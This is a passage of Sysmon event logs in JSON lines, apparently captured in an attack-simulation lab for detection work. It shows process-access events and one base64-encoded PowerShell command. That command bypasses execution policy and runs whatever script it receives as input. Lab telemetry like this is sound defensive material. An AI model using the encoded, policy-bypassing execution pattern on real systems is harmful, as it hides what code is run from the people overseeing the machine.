JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-00106CE50800}","ParentProcessId":"4884","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nSourceProcessId: 4884\r\nSourceThreadId: 3960\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","SourceProcessId":"4884","SourceThreadId":"3960","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a